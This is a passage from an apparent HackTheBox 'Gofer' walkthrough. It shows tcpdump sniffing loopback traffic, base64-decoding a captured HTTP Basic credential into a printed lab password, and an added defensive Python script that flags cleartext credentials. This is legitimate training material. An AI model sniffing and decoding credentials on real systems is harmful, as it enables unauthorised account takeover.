tcpdump


PEAS has discovered that the current user, jhudson, is able to sniff packets using tcpdump. This means that I am able to audit the entire network traffic on the host, including traffic that never leaves the loopback interface.

jhudson@gofer:/opt/notes$ tcpdump -n -i lo -v
tcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 262144 bytes
20:05:01.471277 IP (tos 0x0, ttl 64, id 57128, offset 0, flags [DF], proto TCP (6), length 60)
    127.0.0.1.35148 > 127.0.0.1.80: Flags [S], cksum 0xfe30 (incorrect -> 0xc933), seq 3389266128, win 65495, options [mss 65495,sackOK,TS val 2220922364 ecr 0,nop,wscale 7], length 0
20:05:01.471297 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto TCP (6), length 60)
    127.0.0.1.80 > 127.0.0.1.35148: Flags [S.], cksum 0xfe30 (incorrect -> 0x68da), seq 3651234900, ack 3389266129, win 65483, options [mss 65495,sackOK,TS val 2220922365 ecr 2220922364,nop,wscale 7], length 0
20:05:01.471309 IP (tos 0x0, ttl 64, id 57129, offset 0, flags [DF], proto TCP (6), length 52)
    127.0.0.1.35148 > 127.0.0.1.80: Flags [.], cksum 0xfe28 (incorrect -> 0x8f95), ack 1, win 512, options [nop,nop,TS val 2220922365 ecr 2220922365], length 0
20:05:01.471375 IP (tos 0x0, ttl 64, id 57130, offset 0, flags [DF], proto TCP (6), length 215)
    127.0.0.1.35148 > 127.0.0.1.80: Flags [P.], cksum 0xfecb (incorrect -> 0xa0ae), seq 1:164, ack 1, win 512, options [nop,nop,TS val 2220922365 ecr 2220922365], length 163: HTTP, length: 163
	get /?url=http://gofer.htb HTTP/1.1
	host: proxy.gofer.htb
	authorization: Basic dGJ1Y2tsZXk6b29QNGRpZXRpZTNvX2hxdWFldGk=
	user-agent: curl/7.74.0
	accept: */*

The command above captures all the network traffic over the loopback interface (-i lo) with verbose output (-v). One of the captured packets is a GET request to the proxy server at proxy.gofer.htb carrying a base64-encoded credential in the Authorization header.

Decoding


┌──(kali㉿kali)-[~/archive/htb/labs/gofer]
└─$ echo 'dGJ1Y2tsZXk6b29QNGRpZXRpZTNvX2hxdWFldGk=' | base64 -d     
tbuckley:ooP4dietie3o_hquaeti

Decoding the base64 string back to ASCII reveals the credentials for the tbuckley user: tbuckley:ooP4dietie3o_hquaeti. HTTP Basic authentication only base64-encodes the username and password, so anyone who can read the cleartext traffic can recover them directly.
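The following is an added example, not part of the original writeup, showing the check a defender would run over a captured cleartext HTTP request: parse the headers, flag any Authorization header that a packet capture would expose, and for the Basic scheme decode it far enough to name the affected user while masking the secret. The SAMPLE_REQUEST bytes are constructed here from the request shown in the tcpdump output above; the function and variable names are my own. It goes slightly beyond the page by also reporting non-Basic schemes (for example Bearer), since any Authorization value sent in cleartext is equally readable on the wire.

```python
import base64
import binascii
import re

# Constructed sample: the request from the loopback capture above, re-typed
# with CRLF line endings as it would appear on the wire.
SAMPLE_REQUEST = (
    b"GET /?url=http://gofer.htb HTTP/1.1\r\n"
    b"Host: proxy.gofer.htb\r\n"
    b"Authorization: Basic dGJ1Y2tsZXk6b29QNGRpZXRpZTNvX2hxdWFldGk=\r\n"
    b"User-Agent: curl/7.74.0\r\n"
    b"Accept: */*\r\n"
    b"\r\n"
)


def parse_request_headers(raw):
    """Split a raw HTTP/1.x request into (request_line, headers).
    Header names are lower-cased so lookups are case-insensitive."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if ":" not in line:
            continue  # tolerate malformed lines rather than abort the audit
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def decode_basic_auth(value):
    """Return (username, password) for an 'Authorization: Basic ...' value,
    or None if the scheme is not Basic or the payload is not valid base64."""
    m = re.match(r"(?i)^basic\s+([A-Za-z0-9+/=]+)$", value)
    if not m:
        return None
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if ":" not in decoded:
        return None
    user, password = decoded.split(":", 1)
    return user, password


def audit_plaintext_credentials(raw):
    """Return a list of findings for credentials exposed in a cleartext
    HTTP request. Secrets are masked so the report itself is safe to share."""
    request_line, headers = parse_request_headers(raw)
    auth = headers.get("authorization")
    if not auth:
        return []
    finding = {
        "severity": "high",
        "host": headers.get("host", "?"),
        "request": request_line,
    }
    creds = decode_basic_auth(auth)
    if creds:
        user, password = creds
        finding["issue"] = "HTTP Basic credentials sent in cleartext"
        finding["user"] = user
        # keep two characters so the finding can be matched to a rotation ticket
        finding["password_masked"] = password[:2] + "*" * max(len(password) - 2, 0)
    else:
        scheme = auth.split(None, 1)[0]
        finding["issue"] = "Authorization header (%s) sent in cleartext" % scheme
    return [finding]


if __name__ == "__main__":
    for f in audit_plaintext_credentials(SAMPLE_REQUEST):
        print(f)
```

Running it over the sample reports the tbuckley account and the proxy host without echoing the password; the same function can be fed request payloads exported from a pcap to find every account whose credentials are being replayed over a cleartext socket and need rotation.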

Moving on to the Lateral Movement phase.